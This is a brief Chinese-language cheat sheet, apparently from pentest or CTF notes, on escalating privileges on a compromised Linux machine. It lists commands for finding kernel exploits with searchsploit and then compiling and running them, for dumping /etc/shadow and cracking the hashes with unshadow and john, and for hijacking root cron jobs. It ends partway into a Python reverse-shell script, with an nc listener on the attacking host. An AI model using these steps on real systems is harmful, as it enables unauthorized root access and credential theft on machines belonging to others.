提权思路
- 当我们已经获取目标机器的较低权限时,我们需要扩大战果来提升权限。
- 查看系统发行版本
cat /etc/issue或者cat /etc/*-release
,查看内核信息uname -a
。根据版本信息使用searchsploit xxx
来查询发行的内核版本是否存在内核溢出漏洞,如果存在漏洞可以直接利用漏洞代码来提升权限:
* 上传漏洞代码,使用gcc xxx.c -o exploit
将代码编译成名为exploit的可执行文件
*chmod +x exploit
赋予执行权限
*./exploit
执行漏洞进行提权 - 明文root密码提权,查看
/etc/shadows
里面存储密码的hash(一般只有root权限可读),如果可以查看到shadow里面的密码:
* 进入etc目录下
* 使用unshadow passwd shadow >cracked
*john cracked
进行破解密码 - 计划任务,系统中会存在一些定时执行的任务,可以使用
cat /etc/crontab
查看定时任务,是否可以替换root定时执行的文件来获取root权限。如果存在.py文件可以使用如下python脚本代替。攻击机上使用nc -nlvp 4444
监听4444端口
*#!/usr/bin/python import socket,subproce